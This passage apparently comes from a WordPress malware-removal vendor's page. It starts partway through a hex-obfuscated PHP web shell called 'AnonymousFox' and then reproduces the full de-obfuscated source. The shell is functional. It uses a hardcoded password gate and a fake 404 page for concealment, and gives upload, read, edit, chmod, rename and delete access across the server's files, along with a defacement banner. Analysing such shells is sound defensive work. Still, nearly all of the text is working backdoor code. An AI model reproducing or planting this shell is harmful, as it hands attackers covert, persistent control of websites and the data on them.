\x43o\x64\x65\x64 By \x3cf\x6fn\x74 co\x6c\x6f\x72=\"\x72\x65\x64\">A\x6e\x6fn\x79m\x6f\x75\x73\x46o\x78</font\x3e\n</\x42\x4fDY\x3e\n\x3c/\x48\x54\x4dL\x3e";function perms($file){${"\x47L\x4f\x42A\x4c\x53"}["\x64\x6b\x70ak\x6a\x73\x72l"]="pe\x72m\x73";$towkrpejl="\x70\x65\x72m\x73";$sbfrdoazgwh="\x70e\x72\x6d\x73";$rrtohhd="i\x6ef\x6f";${${"\x47\x4c\x4fB\x41\x4cS"}["d\x6b\x70\x61k\x6a\x73r\x6c"]}=fileperms(${${"\x47L\x4f\x42\x41L\x53"}["\x62o\x77ba\x75wy\x73"]});${"\x47L\x4f\x42A\x4c\x53"}["\x64\x74\x69ku\x73h\x68\x73"]="\x69\x6e\x66\x6f";$xoylaojbe="\x70\x65r\x6d\x73";${"\x47\x4cOBA\x4c\x53"}["\x64n\x6d\x74s\x75p\x71t\x62\x6e\x75"]="p\x65\x72\x6d\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x6f\x65xa\x78\x6b\x6b\x77\x64"]="\x70e\x72m\x73";$mfkxnyntijj="\x70\x65\x72\x6d\x73";$oxacwtt="\x70\x65\x72\x6d\x73";${"\x47LO\x42\x41\x4cS"}["\x63\x79\x70\x79btw\x61m"]="\x69\x6e\x66o";$iprydtyjcb="\x70e\x72m\x73";${"\x47\x4cO\x42A\x4c\x53"}["\x66b\x76utj\x78\x6fucc"]="\x70\x65\x72\x6d\x73";$ccbunoi="\x70\x65r\x6d\x73";$oglveiok="\x69\x6efo";${"G\x4c\x4f\x42\x41\x4cS"}["\x70\x67\x75\x78mi\x76\x67"]="\x70\x65\x72m\x73";$xchdynwsxl="\x70\x65\x72\x6d\x73";${"\x47\x4cO\x42AL\x53"}["\x62\x68u\x73\x73\x69\x67\x71"]="\x70\x65\x72ms";$wvcboxowf="i\x6e\x66\x6f";if((${${"\x47L\x4f\x42\x41L\x53"}["\x6e\x68n\x6eq\x69\x73\x75\x6a"]}&0xC000)==0xC000){${${"\x47\x4c\x4fB\x41\x4c\x53"}["t\x62\x6dl\x61\x73\x6e\x70j"]}="\x73";}elseif((${$oxacwtt}&0xA000)==0xA000){$emhjtvzyvn="inf\x6f";${$emhjtvzyvn}="\x6c";}elseif((${${"G\x4c\x4fB\x41LS"}["\x70\x67u\x78\x6d\x69\x76\x67"]}&0x8000)==0x8000){${"\x47LO\x42\x41\x4c\x53"}["\x67a\x65\x77w\x64"]="\x69n\x66o";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x67\x61e\x77\x77d"]}="-";}elseif((${$ccbunoi}&0x6000)==0x6000){${${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x62ml\x61\x73\x6epj"]}="b";}elseif((${${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x68\x6e\x6eq\x69\x73\x75\x6a"]}&0x4000)==0x4000){$pgjvenuhu="\x69n\x66\x6f";${$pgjvenuhu}="d";}elseif((${${"\x47L\x4f\x42AL\x53"}["\x74oexa\x78\x6b\x6b\x77\x64"]}&0x2000)==0x2000){$mmuvfm="\x69\x6e\x66\x6f";${$mmuvfm}="c";}elseif((${${"G\x4c\x4fB\x41L\x53"}["\x62\x68\x75\x73\x73\x69\x67\x71"]}&0x1000)==0x1000){${${"\x47\x4c\x4fB\x41\x4cS"}["tb\x6d\x6ca\x73npj"]}="\x70";}else{${${"\x47\x4c\x4f\x42ALS"}["\x74\x62\x6d\x6ca\x73\x6e\x70\x6a"]}="u";}${${"\x47\x4cO\x42\x41L\x53"}["\x74b\x6d\x6c\x61\x73np\x6a"]}.=((${${"\x47\x4c\x4fBAL\x53"}["n\x68n\x6eq\x69\x73u\x6a"]}&0x0100)?"\x72":"-");${"\x47\x4c\x4f\x42\x41L\x53"}["\x72\x66j\x6ffvw"]="\x69\x6ef\x6f";${${"GLOB\x41\x4c\x53"}["\x74b\x6d\x6c\x61sn\x70\x6a"]}.=((${$sbfrdoazgwh}&0x0080)?"\x77":"-");${${"\x47L\x4fBALS"}["\x64\x74\x69\x6b\x75\x73\x68hs"]}.=((${$xchdynwsxl}&0x0040)?((${$towkrpejl}&0x0800)?"\x73":"\x78"):((${${"\x47\x4c\x4fBA\x4cS"}["\x66b\x76\x75\x74\x6a\x78\x6fucc"]}&0x0800)?"\x53":"-"));${$wvcboxowf}.=((${$xoylaojbe}&0x0020)?"\x72":"-");${${"\x47LO\x42A\x4c\x53"}["c\x79\x70y\x62\x74\x77a\x6d"]}.=((${${"\x47\x4cOB\x41\x4c\x53"}["\x64\x6em\x74\x73\x75pq\x74\x62\x6e\x75"]}&0x0010)?"\x77":"-");${$rrtohhd}.=((${${"GL\x4f\x42\x41\x4cS"}["\x6e\x68\x6enqi\x73\x75j"]}&0x0008)?((${$mfkxnyntijj}&0x0400)?"\x73":"\x78"):((${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6e\x68\x6e\x6e\x71i\x73\x75\x6a"]}&0x0400)?"S":"-"));${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x62m\x6c\x61\x73\x6epj"]}.=((${${"G\x4c\x4f\x42\x41LS"}["nhnnq\x69\x73\x75j"]}&0x0004)?"r":"-");${${"\x47\x4cO\x42\x41\x4cS"}["r\x66\x6ao\x66\x76w"]}.=((${${"GL\x4fB\x41\x4cS"}["\x6ehnn\x71\x69\x73u\x6a"]}&0x0002)?"\x77":"-");${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x62\x6dlas\x6e\x70\x6a"]}.=((${${"\x47L\x4f\x42A\x4c\x53"}["\x6e\x68n\x6e\x71\x69s\x75j"]}&0x0001)?((${$iprydtyjcb}&0x0200)?"\x74":"\x78"):((${${"\x47LOB\x41\x4c\x53"}["\x6e\x68n\x6eqi\x73uj"]}&0x0200)?"T":"-"));return${$oglveiok};}echo "\nH\x61\x63k\x65\x64\x20\x42y\x20An\x6f\x6e\x79\x6do\x75\x73\x46\x6fx1.0, \x43o\x64\x65\x64\x20\x42\x79\x20\x41n\x6f\x6e\x79m\x6fu\x73Fo\x78\n";
?>

Decoded(de-Obfuscated) php code

<?php

$GLOBALS["tbmlasnpj"] = "info";
$GLOBALS["nhnnqisuj"] = "perms";
$GLOBALS["bowbauwys"] = "file";
$GLOBALS["pdumdsioe"] = "size";
$GLOBALS["rscefmhjzj"] = "dir";
$GLOBALS["gcignji"] = "scandir";
$GLOBALS["xtlbryucpr"] = "pat";
$GLOBALS["kigbulremu"] = "i";
$GLOBALS["gfrflpsqehl"] = "id";
$GLOBALS["mginqxarm"] = "paths";
$GLOBALS["hmrkllmd"] = "path";
$GLOBALS["labyvmzopxr"] = "password";
$GLOBALS["jnrdps"] = "pass";
$jclgpbeadx = "path";
$sxqfmim = "password";
$GLOBALS["cyokfcdwhh"] = "pass";
$xwekasa = "chk_login";
$GLOBALS["cydnuvemea"] = "password";
@session_start();
$vipcdkodln = "chk_login";
@set_time_limit(0);
@($pass = $_POST["Fuck"]);
$chk_login = true;
$password = "F fuckAll O";
if ($pass == $password) {
    $_SESSION["nst"] = "{$pass}";
}
if (${$vipcdkodln} == true) {
    if (!isset($_SESSION["nst"]) or $_SESSION["nst"] != ${$GLOBALS["labyvmzopxr"]}) {
        die("\n <head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<p>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.</p>\n<hr>\n<address>Apache/2.4.16 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Server at Port 80</address>\n</body>\n  \n<title>AnonymousFox</title>\n  <center>\n  <table border=0 cellpadding=0 cellspacing=0 width=100% height=100%>\n  <tr><td valign=middle align=center>\n  \n  <form method=post>\n  <font size=1 face=verdana color=><strong><center></center></strong><br>\n  <input type=Fuck name=Fuck size=1>\n  </form>\n  \n  ");
    }
}
echo "<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\n<title>Cod3d By AnonymousFox</title>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center>Hacked By AnonymousFox</center></H1>\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Current Path : ";
$trvktk = "id";
$zycdyeebcy = "pat";
if (isset($_GET["path"])) {
    ${$GLOBALS["hmrkllmd"]} = $_GET["path"];
} else {
    $GLOBALS["bhuioojorpem"] = "path";
    $path = getcwd();
}
${$GLOBALS["hmrkllmd"]} = str_replace("\\", "/", ${$GLOBALS["hmrkllmd"]});
${$GLOBALS["mginqxarm"]} = explode("/", ${$jclgpbeadx});
foreach (${$GLOBALS["mginqxarm"]} as ${$trvktk} => ${$zycdyeebcy}) {
    $GLOBALS["jnbqglynv"] = "pat";
    $GLOBALS["bmimwsrjhtu"] = "i";
    if ($pat == "" && ${$GLOBALS["gfrflpsqehl"]} == 0) {
        $GLOBALS["nbademloybxb"] = "a";
        $a = true;
        echo "<a href=\"?path=/\">/</a>";
        continue;
    }
    $GLOBALS["itwjbsg"] = "pat";
    $GLOBALS["jqgqjuvnkskf"] = "i";
    if ($pat == "") {
        continue;
    }
    $lckssbflqo = "i";
    echo "<a href=\"?path=";
    for ($i = 0; ${$GLOBALS["bmimwsrjhtu"]} <= ${$GLOBALS["gfrflpsqehl"]}; ${$GLOBALS["jqgqjuvnkskf"]}++) {
        echo "{$paths[$i]}";
        if (${$GLOBALS["kigbulremu"]} != ${$GLOBALS["gfrflpsqehl"]}) {
            echo "/";
        }
    }
    echo "\">" . ${$GLOBALS["xtlbryucpr"]} . "</a>/";
}
echo "</td></tr><tr><td>";
if (isset($_FILES["file"])) {
    $hloelgm = "path";
    if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) {
        echo "<font color=\"green\">File Upload Done.</font><br />";
    } else {
        echo "<font color=\"red\">File Upload Error.</font><br />";
    }
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\nUpload File : <input type=\"file\" name=\"file\" />\n<input type=\"submit\" value=\"upload\" />\n</form>\n</td></tr>";
if (isset($_GET["filesrc"])) {
    echo "<tr><td>Current File : ";
    echo $_GET["filesrc"];
    echo "</tr></td></table><br />";
    echo "<pre>" . htmlspecialchars(file_get_contents($_GET["filesrc"])) . "</pre>";
} elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") {
    echo "</table><br /><center>" . $_POST["path"] . "<br /><br />";
    if ($_POST["opt"] == "chmod") {
        if (isset($_POST["perm"])) {
            if (chmod($_POST["path"], $_POST["perm"])) {
                echo "<font color=\"green\">Change Permission Done.</font><br />";
            } else {
                echo "<font color=\"red\">Change Permission Error.</font><br />";
            }
        }
        echo "<form method=\"POST\">\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"" . substr(sprintf("%o", fileperms($_POST["path"])), 4) . "\" />\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\n<input type=\"submit\" value=\"Go\" />\n</form>";
    } elseif ($_POST["opt"] == "rename") {
        if (isset($_POST["newname"])) {
            if (rename($_POST["path"], ${$GLOBALS["hmrkllmd"]} . "/" . $_POST["newname"])) {
                echo "<font color=\"green\">Change Name Done.</font><br />";
            } else {
                echo "<font color=\"red\">Change Name Error.</font><br />";
            }
            $_POST["name"] = $_POST["newname"];
        }
        echo "<form method=\"POST\">\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"" . $_POST["name"] . "\" />\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\n<input type=\"submit\" value=\"Go\" />\n</form>";
    } elseif ($_POST["opt"] == "edit") {
        if (isset($_POST["src"])) {
            $qwxldrs = "fp";
            $fp = fopen($_POST["path"], "w");
            $fgutum = "fp";
            $GLOBALS["awakzesnu"] = "fp";
            if (fwrite($fp, $_POST["src"])) {
                echo "<font color=\"green\">Edit File Done.</font><br />";
            } else {
                echo "<font color=\"red\">Edit File Error.</font><br />";
            }
            fclose(${$fgutum});
        }
        echo "<form method=\"POST\">\n<textarea cols=80 rows=20 name=\"src\">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br />\n<input type=\"hidden\" name=\"path\" value=\"" . $_POST["path"] . "\">\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\n<input type=\"submit\" value=\"Go\" />\n</form>";
    }
    echo "</center>";
} else {
    $GLOBALS["jjutpuoxot"] = "scandir";
    echo "</table><br /><center>";
    if (isset($_GET["option"]) && $_POST["opt"] == "delete") {
        if ($_POST["type"] == "dir") {
            if (rmdir($_POST["path"])) {
                echo "<font color=\"green\">Delete Dir Done.</font><br />";
            } else {
                echo "<font color=\"red\">Delete Dir Error.</font><br />";
            }
        } elseif ($_POST["type"] == "file") {
            if (unlink($_POST["path"])) {
                echo "<font color=\"green\">Delete File Done.</font><br />";
            } else {
                echo "<font color=\"red\">Delete File Error.</font><br />";
            }
        }
    }
    echo "</center>";
    ${$GLOBALS["gcignji"]} = scandir(${$GLOBALS["hmrkllmd"]});
    $danrbui = "file";
    echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr class=\"first\">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>";
    foreach (${$GLOBALS["gcignji"]} as ${$GLOBALS["rscefmhjzj"]}) {
        $ifxtpvlja = "dir";
        if (!is_dir("{$path}/{$dir}") || $dir == "." || ${$GLOBALS["rscefmhjzj"]} == "..") {
            continue;
        }
        echo "<tr>\n<td><a href=\"?path={$path}/{$dir}\">{$dir}</a></td>\n<td><center>--</center></td>\n<td><center>";
        if (is_writable("{$path}/{$dir}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$dir}")) {
            echo "<font color=\"red\">";
        }
        echo perms("{$path}/{$dir}");
        if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
            echo "</font>";
        }
        echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"dir\">\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
    }
    echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
    foreach (${$GLOBALS["jjutpuoxot"]} as ${$danrbui}) {
        $bsfpmqkaxz = "size";
        if (!is_file("{$path}/{$file}")) {
            continue;
        }
        ${$GLOBALS["pdumdsioe"]} = filesize("{$path}/{$file}") / 1024;
        ${$bsfpmqkaxz} = round(${$GLOBALS["pdumdsioe"]}, 3);
        if (${$GLOBALS["pdumdsioe"]} >= 1024) {
            $rzssuloo = "size";
            $GLOBALS["cxuedrfd"] = "size";
            $size = round($size / 1024, 2) . " MB";
        } else {
            ${$GLOBALS["pdumdsioe"]} .= " KB";
        }
        echo "<tr>\n<td><a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\n<td><center>" . ${$GLOBALS["pdumdsioe"]} . "</center></td>\n<td><center>";
        if (is_writable("{$path}/{$file}")) {
            echo "<font color=\"green\">";
        } elseif (!is_readable("{$path}/{$file}")) {
            echo "<font color=\"red\">";
        }
        echo perms("{$path}/{$file}");
        if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
            echo "</font>";
        }
        echo "</center></td>\n<td><center><form method=\"POST\" action=\"?option&path={$path}\">\n<select name=\"opt\">\n<option value=\"\"></option>\n<option value=\"delete\">Delete</option>\n<option value=\"chmod\">Chmod</option>\n<option value=\"rename\">Rename</option>\n<option value=\"edit\">Edit</option>\n</select>\n<input type=\"hidden\" name=\"type\" value=\"file\">\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\n<input type=\"submit\" value=\">\" />\n</form></center></td>\n</tr>";
    }
    echo "</table>\n</div>";
}
echo "<br />Hacked By AnonymousFox<font color=\"red\">1.0</font>, Coded By <font color=\"red\">AnonymousFox</font>\n</BODY>\n</HTML>";
function perms($file)
{
    $GLOBALS["dkpakjsrl"] = "perms";
    $towkrpejl = "perms";
    $sbfrdoazgwh = "perms";
    $rrtohhd = "info";
    $perms = fileperms(${$GLOBALS["bowbauwys"]});
    $GLOBALS["dtikushhs"] = "info";
    $xoylaojbe = "perms";
    $GLOBALS["dnmtsupqtbnu"] = "perms";
    $GLOBALS["toexaxkkwd"] = "perms";
    $mfkxnyntijj = "perms";
    $oxacwtt = "perms";
    $GLOBALS["cypybtwam"] = "info";
    $iprydtyjcb = "perms";
    $GLOBALS["fbvutjxoucc"] = "perms";
    $ccbunoi = "perms";
    $oglveiok = "info";
    $GLOBALS["pguxmivg"] = "perms";
    $xchdynwsxl = "perms";
    $GLOBALS["bhussigq"] = "perms";
    $wvcboxowf = "info";
    if ((${$GLOBALS["nhnnqisuj"]} & 0xc000) == 0xc000) {
        ${$GLOBALS["tbmlasnpj"]} = "s";
    } elseif ((${$oxacwtt} & 0xa000) == 0xa000) {
        $emhjtvzyvn = "info";
        $info = "l";
    } elseif (($perms & 0x8000) == 0x8000) {
        $GLOBALS["gaewwd"] = "info";
        $info = "-";
    } elseif ((${$ccbunoi} & 0x6000) == 0x6000) {
        ${$GLOBALS["tbmlasnpj"]} = "b";
    } elseif ((${$GLOBALS["nhnnqisuj"]} & 0x4000) == 0x4000) {
        $pgjvenuhu = "info";
        $info = "d";
    } elseif (($perms & 0x2000) == 0x2000) {
        $mmuvfm = "info";
        $info = "c";
    } elseif (($perms & 0x1000) == 0x1000) {
        ${$GLOBALS["tbmlasnpj"]} = "p";
    } else {
        ${$GLOBALS["tbmlasnpj"]} = "u";
    }
    ${$GLOBALS["tbmlasnpj"]} .= ${$GLOBALS["nhnnqisuj"]} & 0x100 ? "r" : "-";
    $GLOBALS["rfjofvw"] = "info";
    ${$GLOBALS["tbmlasnpj"]} .= ${$sbfrdoazgwh} & 0x80 ? "w" : "-";
    $info .= ${$xchdynwsxl} & 0x40 ? ${$towkrpejl} & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
    ${$wvcboxowf} .= ${$xoylaojbe} & 0x20 ? "r" : "-";
    $info .= $perms & 0x10 ? "w" : "-";
    ${$rrtohhd} .= ${$GLOBALS["nhnnqisuj"]} & 0x8 ? ${$mfkxnyntijj} & 0x400 ? "s" : "x" : (${$GLOBALS["nhnnqisuj"]} & 0x400 ? "S" : "-");
    ${$GLOBALS["tbmlasnpj"]} .= ${$GLOBALS["nhnnqisuj"]} & 0x4 ? "r" : "-";
    $info .= ${$GLOBALS["nhnnqisuj"]} & 0x2 ? "w" : "-";
    ${$GLOBALS["tbmlasnpj"]} .= ${$GLOBALS["nhnnqisuj"]} & 0x1 ? ${$iprydtyjcb} & 0x200 ? "t" : "x" : (${$GLOBALS["nhnnqisuj"]} & 0x200 ? "T" : "-");
    return ${$oglveiok};
}
echo "\nHacked By AnonymousFox1.0, Coded By AnonymousFox\n";


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.